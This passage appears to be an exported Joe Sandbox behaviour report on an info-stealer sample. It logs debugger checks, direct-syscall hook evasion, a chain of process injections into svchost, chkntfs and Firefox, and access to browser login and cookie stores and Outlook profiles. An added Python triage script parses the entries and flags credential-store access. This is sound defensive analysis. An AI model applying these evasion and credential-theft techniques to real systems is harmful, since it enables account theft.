                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C810F9 GetUserObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetUserObjectSecurity,0_2_00C810F9
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C52622
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C4083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C4083F
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C40C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C40C21

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtProtectVirtualMemory: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe protection: read write
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 2328
                Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                Source: C:\Users\user\Desktop\1162-201.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68E008
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C81201
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8B226 SendInput,keybd_event,0_2_00C8B226
                Source: C:\Users\user\Desktop\1162-201.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1162-201.exe"
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C80B62
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C81663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C81663
                Source: 1162-201.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: 1162-201.exe, OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C40698 cpuid 0_2_00C40698
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C98195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00C98195
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C5B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C5B952
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C242DE

                Stealing of Sensitive Information

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
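
                The behaviour lists above are long because the sandbox logs every hit: the repeated fs:[00000030h] PEB reads under the debugger-detection signature, the direct Nt* syscalls under HIPS / PFW / Operating System Protection Evasion, the cross-process section mappings that make up the injection chain (1162-201.exe to svchost.exe to OtAlYRopPg.exe / chkntfs.exe to firefox.exe), and the browser and Outlook credential-store accesses in this section. The following Python script is an added example and is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It parses lines in the report's fused "Source: <process><signature>: <detail>" form and condenses them into unique PEB-reading functions, a per-API direct-syscall tally, the injection chain as (source, target, protection) edges, and the credential stores touched. The SAMPLE lines are constructed by copying a few entries from the sections above; the CREDENTIAL_STORES descriptions and the treatment of the trailing "Jump to behavior" link text as residue are assumptions about the report format, not something the report states.

```python
"""Triage helper for Joe Sandbox behaviour lines (added example, not report tooling)."""
import re
from collections import defaultdict

# Constructed sample: a handful of lines copied from the report sections above.
SAMPLE = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90",
    r"Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior",
    r"Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior",
    r"Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtResumeThread: Direct from: 0x773836ACJump to behavior",
    r"Source: C:\Users\user\Desktop\1162-201.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior",
    r"Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior",
]

JOE_LINK_TEXT = "Jump to behavior"  # assumed link residue appended to many report lines

RE_PEB = re.compile(
    r"Source: (?P<proc>.+?)Code function: (?P<fn>\d+_\d+_[0-9A-F]+) "
    r"mov (?P<reg>\w+), dword ptr fs:\[00000030h\]")
RE_SYSCALL = re.compile(
    r"Source: (?P<proc>.+?)(?P<api>Nt[A-Z][A-Za-z]+): Direct from: (?P<addr>0x[0-9A-F]+)")
RE_SECTION = re.compile(
    r"Source: (?P<src>.+?)Section loaded: NULL target: (?P<dst>.+?) protection: (?P<prot>.+)$")
RE_ACCESS = re.compile(r"Source: (?P<proc>.+?)(?:File|Key) opened: (?P<path>.+)$")

# Substring of an opened path -> what that store holds (assumed descriptions).
CREDENTIAL_STORES = {
    "Login Data": "saved browser passwords (SQLite; values encrypted with the key kept in Local State)",
    "Local State": "browser master key (DPAPI-wrapped AES key protecting Login Data and Cookies)",
    "Cookies": "browser session cookies",
    "Web Data": "browser autofill and payment data",
    "Windows Messaging Subsystem\\Profiles\\Outlook": "Outlook/MAPI profile holding mail account credentials",
}


def strip_link(line):
    """Drop the trailing link text the HTML-to-text export fused onto the line."""
    return line[:-len(JOE_LINK_TEXT)] if line.endswith(JOE_LINK_TEXT) else line


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def unique_peb_readers(lines):
    """Collapse repeated 'mov reg, fs:[30h]' hits to one entry per function, per process."""
    found = defaultdict(set)
    for m in filter(None, map(RE_PEB.match, map(strip_link, lines))):
        found[basename(m["proc"])].add(m["fn"])
    return {proc: sorted(fns) for proc, fns in found.items()}


def syscall_tally(lines):
    """Count direct Nt* syscall invocations per API (user-mode hook bypass indicator)."""
    tally = defaultdict(int)
    for m in filter(None, map(RE_SYSCALL.match, map(strip_link, lines))):
        tally[m["api"]] += 1
    return dict(tally)


def injection_chain(lines):
    """(source, target, protection) edges from cross-process section mapping."""
    return [(basename(m["src"]), basename(m["dst"]), m["prot"])
            for m in filter(None, map(RE_SECTION.match, map(strip_link, lines)))]


def rwx_targets(lines):
    """Processes that received an executable mapping: the likely injection hosts."""
    return [dst for _, dst, prot in injection_chain(lines) if "execute" in prot]


def credential_store_hits(lines):
    """(process, store marker) for every opened file or key that is a known credential store."""
    hits = []
    for m in filter(None, map(RE_ACCESS.match, map(strip_link, lines))):
        for marker in CREDENTIAL_STORES:
            if marker in m["path"]:
                hits.append((basename(m["proc"]), marker))
                break
    return hits


if __name__ == "__main__":
    print("PEB readers:", unique_peb_readers(SAMPLE))
    print("Direct syscalls:", syscall_tally(SAMPLE))
    print("Injection chain:", injection_chain(SAMPLE))
    print("Executable mappings into:", rwx_targets(SAMPLE))
    for proc, store in credential_store_hits(SAMPLE):
        print(f"{proc} opened {store}: {CREDENTIAL_STORES[store]}")
```

Run against the full exported report text (one line per entry) instead of SAMPLE to get the same summary for every process; the edge list from injection_chain is what to compare against the process tree when deciding which host (here chkntfs.exe) is the one that actually reads the browser stores.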

                Remote Access Functionality

                Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
